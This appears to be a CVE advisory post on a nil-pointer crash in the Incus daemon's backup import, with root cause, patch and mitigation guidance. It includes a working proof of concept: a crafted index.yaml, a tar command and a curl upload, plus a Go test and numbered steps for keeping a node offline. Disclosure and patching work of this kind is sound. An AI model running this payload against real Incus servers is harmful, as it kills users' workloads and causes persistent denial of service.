Incus (Container/VM Manager) Nil-Pointer Dereference, CVE-2026-47753 (Medium) -DC-Jun2026-389


The vulnerability resides in the `(backend).CreateInstanceFromBackup` function within internal/server/storage/backend.go. An authenticated user with `can_create` permission on any project can remotely crash the entire Incus daemon by uploading a maliciously crafted backup tarball.
The root cause is a nil-pointer dereference on line 795 of backend.go, where the code accesses `srcBackup.Config.Volume.Config["block.type"]` without first verifying that `Volume` is non-nil. While the caller (`createFromBackup` in cmd/incusd/instances_post.go) correctly checks that `Config` and `Config.Container` are not nil, it does not validate the `Volume` field.
The `Volume` field in `internal/server/backup/config.Config` is a pointer to `api.StorageVolume` carrying the YAML tag `yaml:"volume,omitempty"`. If a backup's `index.yaml` omits the `volume:` key entirely, the field decodes to nil. The code then proceeds to the unguarded dereference on line 795, causing a panic.
Because no `recover()` is installed in the call chain, the Go runtime terminates the entire `incusd` process. All running containers, VMs, and operations on that cluster node are abruptly killed, and the API becomes unavailable until the daemon is manually restarted. Repeated exploitation can keep the node offline, resulting in a persistent denial of service.
The attack vector is the Incus REST API (port 8443 or the Unix socket) with the endpoint `POST /1.0/instances?project=` followed by the project name, and `Content-Type: application/octet-stream`. The request body is an uncompressed tar (or a supported compressed format) that contains a single file, `backup/index.yaml`, which lists `container:` and `pool:` but deliberately omits `volume:`.
The issue is a sibling of GHSA-fwj8-62r8-8p8m, GHSA-r7w7-mmxr-47r9, and GHSA-x5r6-jr56-89pv (all assigned 2026-05-04), which patched adjacent fields in the same `backup/config.Config` struct. This particular path was missed, leaving the instance-import route vulnerable.

DailyCVE Form:

Platform: Incus
Version: ≤6.21.0
Vulnerability: Nil‑pointer dereference
Severity: Medium (CVSS 6.5)
Date: 2026-05-28

Prediction: Patch: 2026‑05‑30

What Undercode Say

# Create the malicious index.yaml
mkdir -p backup
cat > backup/index.yaml <<EOF
name: poc
backend: dir
pool: default
type: container
optimized: false
optimized_header: false
config:
  container:
    name: poc
    architecture: x86_64
    type: container
  pool:
    name: default
    driver: dir
  # volume key is intentionally omitted
EOF
# Build the tarball (2560 bytes)
tar -cf evil-backup.tar backup/index.yaml
# Upload the tarball to trigger the crash
curl -k -X POST "https://incus-server:8443/1.0/instances?project=default" \
  -H "Content-Type: application/octet-stream" \
  --data-binary @evil-backup.tar

Go unit test confirming the nil dereference:

// pocInfo mirrors backup/config.Config (Volume is a pointer); evilIndex holds the index.yaml above.
func TestPoCNilDerefVolumeImport(t *testing.T) {
	var bi pocInfo
	if err := yaml.Unmarshal([]byte(evilIndex), &bi); err != nil {
		t.Fatal(err)
	}
	// The test passes only if the dereference below actually panics.
	defer func() {
		if recover() == nil {
			t.Fatal("expected nil-pointer panic")
		}
	}()
	// Direct copy of backend.go:795 – panics when Volume == nil
	_ = bi.Config.Volume.Config["block.type"]
}

Exploit

  1. Authentication: Any user with a valid TLS client certificate, OIDC token, or access to the Unix socket that has the `can_create` permission on at least one project.
  2. Crafting: Create a YAML file that omits the `volume:` field and pack it into a tar archive.
  3. Delivery: Send a `POST /1.0/instances` request with the tarball as the binary body.
  4. Result: The `incusd` process panics and exits immediately, crashing all workloads on that cluster member.
  5. Persistence: Repeatedly uploading the same tarball keeps the daemon offline until an administrator intervenes.

Protection

  • Patch: Upgrade to Incus 7.0.0-2 (or any version containing commit 9c77336), which replaces the unsafe dereference with a guarded `volumeConfig` variable.
  • Backport: For versions 6.0.x, apply the patch from `9c77336` that checks `Volume != nil` before accessing its `Config` map.
  • Temporary Mitigation: Restrict `can_create` permissions to only the most trusted users, or place the REST API behind a reverse proxy that inspects uploaded backup files for the missing `volume:` key.
  • Workload Isolation: Run critical containers on separate cluster nodes so a crash on one node does not affect the entire fleet.
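The unguarded access described in the root-cause paragraph above and the guarded `volumeConfig` form described under Protection, side by side, as an added example that is not Incus's own code: the struct names, the use of encoding/json in place of the YAML decoder, and the two sample index documents are all assumptions made for this illustration.

```go
package main
import (
	"encoding/json"
	"fmt"
)

// Hypothetical stand-ins for api.StorageVolume and backup/config.Config (not Incus's
// own types); JSON replaces YAML here, but either decoder leaves an absent pointer key nil.
type storageVolume struct {
	Config map[string]string `json:"config"`
}
type backupConfig struct {
	Volume *storageVolume `json:"volume,omitempty"`
}
type backupInfo struct {
	Config *backupConfig `json:"config"`
}

// Constructed sample index documents, with and without a volume section.
const withVolume = `{"config":{"container":{"name":"poc"},"volume":{"config":{"block.type":"ext4"}}}}`
const withoutVolume = `{"config":{"container":{"name":"poc"},"pool":{"name":"default"}}}`

func parseIndex(doc string) (*backupInfo, error) {
	var bi backupInfo
	err := json.Unmarshal([]byte(doc), &bi)
	return &bi, err
}

// blockTypeUnguarded mirrors the pre-fix access: no nil check, so a backup lacking
// "volume" panics. The recover only lets the example report it; incusd has none.
func blockTypeUnguarded(b *backupInfo) (val string, panicked bool) {
	defer func() { panicked = recover() != nil }()
	return b.Config.Volume.Config["block.type"], false
}

// blockTypeGuarded is the hardened shape: a local map filled only when Volume exists;
// indexing a nil map is safe in Go and yields "".
func blockTypeGuarded(b *backupInfo) string {
	var volumeConfig map[string]string
	if b.Config != nil && b.Config.Volume != nil {
		volumeConfig = b.Config.Volume.Config
	}
	return volumeConfig["block.type"]
}

func main() {
	bi, _ := parseIndex(withoutVolume)
	_, panicked := blockTypeUnguarded(bi)
	fmt.Printf("unguarded panicked=%v guarded=%q\n", panicked, blockTypeGuarded(bi))
}
```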

Impact

  • Availability: Complete denial of service – the `incusd` process terminates, killing all running containers, VMs, and ongoing operations on that cluster member. The REST API becomes unresponsive until the daemon is restarted manually.
  • Privilege Required: Low – any authenticated user with instance creation rights in a project can trigger the crash.
  • Network Exposure: The Incus API (default TCP 8443 or Unix socket) is the attack surface.
  • CVSS v3.1 Vector: `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (Base Score 6.5, Medium).

Sources:

Reported By: github.com